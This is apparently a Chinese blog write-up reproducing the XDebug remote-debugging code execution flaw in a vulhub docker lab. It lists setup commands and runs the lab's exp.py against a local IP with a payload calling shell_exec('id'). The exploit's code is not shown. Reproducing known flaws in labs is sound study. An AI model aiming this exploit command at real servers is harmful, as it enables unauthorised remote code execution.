XDebug 远程调试漏洞复现(代码执行)

环境搭建

启动docker

systemctl start docker

进入对应目录

cd vulhub/php/xdebug-rce/
启动容器

docker-compose up -d
查看容器

docker ps

XDebug 远程调试漏洞复现(代码执行)

访问8080端口(搭建成功)

XDebug 远程调试漏洞复现(代码执行)

在本机执行exp
exp的位置在vulhub/php/xdebug-rce/目录下(成功执行)

python3 exp.py -t http://10.106.8.91:8080/index.php  -c 'shell_exec('id');'

XDebug 远程调试漏洞复现(代码执行)

 

上一篇:用es6写一个分数库


下一篇:phpstudy后门POC分析和EXP开发